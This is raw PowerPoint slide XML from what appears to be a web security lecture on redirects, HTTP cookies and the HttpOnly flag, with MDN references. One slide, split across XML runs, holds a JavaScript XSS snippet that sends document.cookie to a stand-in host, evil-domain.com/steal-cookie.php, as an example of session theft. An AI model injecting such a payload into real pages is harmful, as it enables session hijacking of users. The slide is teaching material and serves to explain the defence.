            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> property and the new page is loaded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4038600"/>
            <a:ext cx="8001000" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;meta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>equiv</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"refresh"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"0;URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/'"/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="6183868"/>
            <a:ext cx="6553200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>location</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3761351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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>developer.mozilla.org/en-US/docs/Web/HTTP/Caching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2020595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cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When receiving an HTTP request, a server can send a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header with the response. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie is usually stored by the browser and, afterwards, the cookie value is sent along with every request made to the same server as the content of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additionally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, an expiration delay can be specified as well as restrictions to a specific domain and path, limiting how long and to which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>subdomain the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie is sent to.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4953000"/>
            <a:ext cx="4055286" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4245429" y="5486401"/>
            <a:ext cx="4822371" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2797268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Cookie theory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211899" y="990600"/>
            <a:ext cx="8763000" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>get removed when the client is shut down, they last only for the duration of the session. They don't specify any Expires or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Max-Age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directives. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, however, that web browsers often have session restoring enabled, which will make most session cookies actually permanent as if the browser was never closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permanent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Instead of expiring when the client is closed, permanent cookies expire at a specific date (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) or after a specific length of time (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Max-Age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Domain and Path directives define the scope of the cookie, that is the set of URLs the cookies should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>sent back to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>are often used in web application to identify a user and their authenticated session. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>So stealing a cookie from a web application can lead to hijacking the authenticated user's session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: To prevent cross-site scripting (XSS) attacks, HTTP-only cookies aren't accessible via JavaScript through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>property or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>API. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set this flag when you don't need your cookies available in JavaScript. In particular, if you use cookies only to define a session, you don't need it in JavaScript and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> flag should be set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227557" y="6579296"/>
            <a:ext cx="8763000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="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808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.evil-domain.com/steal-cookie.php?cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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804000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00008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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
